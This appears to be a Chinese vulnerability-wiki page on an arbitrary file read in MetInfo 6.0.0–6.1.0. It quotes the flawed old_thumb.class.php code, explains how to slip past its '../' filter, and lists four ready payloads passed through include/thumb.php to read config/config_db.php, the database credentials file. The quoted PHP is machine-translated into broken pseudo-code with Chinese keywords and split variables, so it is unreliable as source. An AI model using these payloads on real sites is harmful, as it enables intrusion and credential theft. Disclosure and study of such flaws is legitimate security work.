menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right MetInfo chevron_right Metinfo任意文件读取.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Metinfo任意文件读取.md
    3.98 KB / 2021-04-21 09:23:46
        MetInfo 任意文件读取
    ====================
    
    一、漏洞简介
    ------------
    
    MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo
    6.0.0\~6.1.0版本中的
    old\_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件
    
    二、漏洞影响
    ------------
    
    MetInfo 6.0.0 MetInfo 6.1.0
    
    三、复现过程
    ------------
    
    ### 漏洞分析
    
    进攻分析
    看下\\MetInfo6\\app\\system\\include\\module\\old\_thumb.class.php
    
        <?php 
        #MetInfo企业内容管理系统
        #版权所有(C)MetInfo Co.,Ltd(http://www.metinfo.cn)。版权所有。
    
        define('IN_MET')或 退出('No权限');
    
        load :: sys_class('web');
    
        class  old_thumb  扩展了 网络 {
    
              公共 功能 doshow () { 全局 $ _M;
    
    
                $ DIR = str_replace函数('../' ,'',$ _GET [ '目录' ]);
    
    
                if(strstr(str_replace($ _ M [ 'url' ] [ 'site' ],'',$ dir),'http')){ 
                    header(“ Content-type:image / jpeg”); 
                    ob_start(); 
                    readfile($ dir); 
                    ob_flush(); 
                    flush(); 死 ;         }
    
    
    
                if($ _M [ 'form' ] [ 'pageset' ]){ 
                  $ path = $ dir。“&met-table = {$ _ M ['form'] ['met-table']}&met-field = {$ _ M ['form'] ['met-field']}”“;
    
                } else { 
                  $ path = $ dir; 
                } 
                $ image = thumb($ path,$ _ M [ 'form' ] [ 'x' ],$ _ M [ 'form' ] [ 'y' ]); if($ _M [ 'form' ] [ 'pageset' ]){           $ img = explode('?',$ image);           $ img = $ img [ 0 ];         } else {           $ img = $ image;         } if($ img){             header(“ Content-type:image / jpeg”);             ob_start();
    
    
    
    
    
    
    
    
    
                    readfile(PATH_WEB.str_replace($ _ M [ 'url' ] [ 'site' ],'',$ img)); 
                    ob_flush(); 
                    flush(); 
                }
    
            } 
        }
    
        #此程序是一个开放源代码系统,可用于商业用途,请自觉购买商业许可证。
        #版权所有(C)MetInfo Co.,Ltd.(http://www.metinfo.cn)。版权所有。
        ?>
    
    从代码中看用看到,\$dir直接由\$\_GET\[\'dir\'\]传递进来,并将../置空。目标是进入到第一个,如果里面的readfile(\$dir);,读取文件。看看如果语句的条件,的英文外面一个strstr函数,判断\$dir中http字符串的首次出现位置,实质上,要进入到这个if语句里面,\$dir中必须包含http字符串。里面的将\$dir中包含\$\_M\[\'url\'\]\[\'site\'\]的部分放置空,这里可以不用管。
    
    ![](./resource/Metinfo任意文件读取/media/rId25.png)
    
    从上面的分析可以构造出有效负载,只要\$dir里包含http字符串就可以进入到readfile函数从而重新读取任意函数,然后可以使用\..././来进行目录替换,因为../会被置空,所以最终payload如下
    
        ?dir=..././http/..././config/config_db.php
        ?dir=.....///http/.....///config/config_db.php
        ?dir=http/.....///.....///config/config_db.php
        ?dir=http\..\..\config\config_db.php
    
    ### 漏洞复现
    
    要先找到调用old\_thumb.class.php的文件,看到include/thumb.php,可以从这个文件里面进入到old\_thumb.class.php
    
        <?php
        # MetInfo Enterprise Content Management System
        # Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
        define('M_NAME', 'include');
        define('M_MODULE', 'include');
        define('M_CLASS', 'old_thumb');
        define('M_ACTION', 'doshow');
        require_once '../app/system/entrance.php';
        # This program is an open source system, commercial use, please consciously to purchase commercial license.
        # Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
        ?>
    
    所以我们通过thumb.php将构造好的\$dir传入即可。
    
    ![](./resource/Metinfo任意文件读取/media/rId27.png)
    
    可以看到成功的读取到了config/config\_
    
    
    links
    file_download